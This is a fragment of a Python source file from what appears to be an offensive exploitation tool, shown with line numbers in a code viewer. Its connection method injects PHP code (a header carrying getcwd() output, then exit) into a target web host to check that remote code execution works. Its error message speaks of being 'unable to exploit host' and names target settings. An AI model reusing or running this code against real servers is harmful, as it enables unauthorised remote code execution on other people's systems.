(self)
| 55 | @brief See base class for details. |
| 56 | """ |
| 57 | def _Base__make_connection(self): |
| 58 | try: |
| 59 | return self._Base__send_message(f"header('{self.header}: '" |
| 60 | f" . getcwd());" |
| 61 | f"exit;") |
| 62 | except: |
| 63 | raise CommandException(f"Unable to exploit host. Make sure the " |
| 64 | f"TARGET_HOST, TARGET_PATH, TARGET_TYPE, " |
| 65 | f"and METHOD are correct.") |
| 66 | |
| 67 | """ |
| 68 | @brief See base class for details. |
nothing calls this directly
no test coverage detected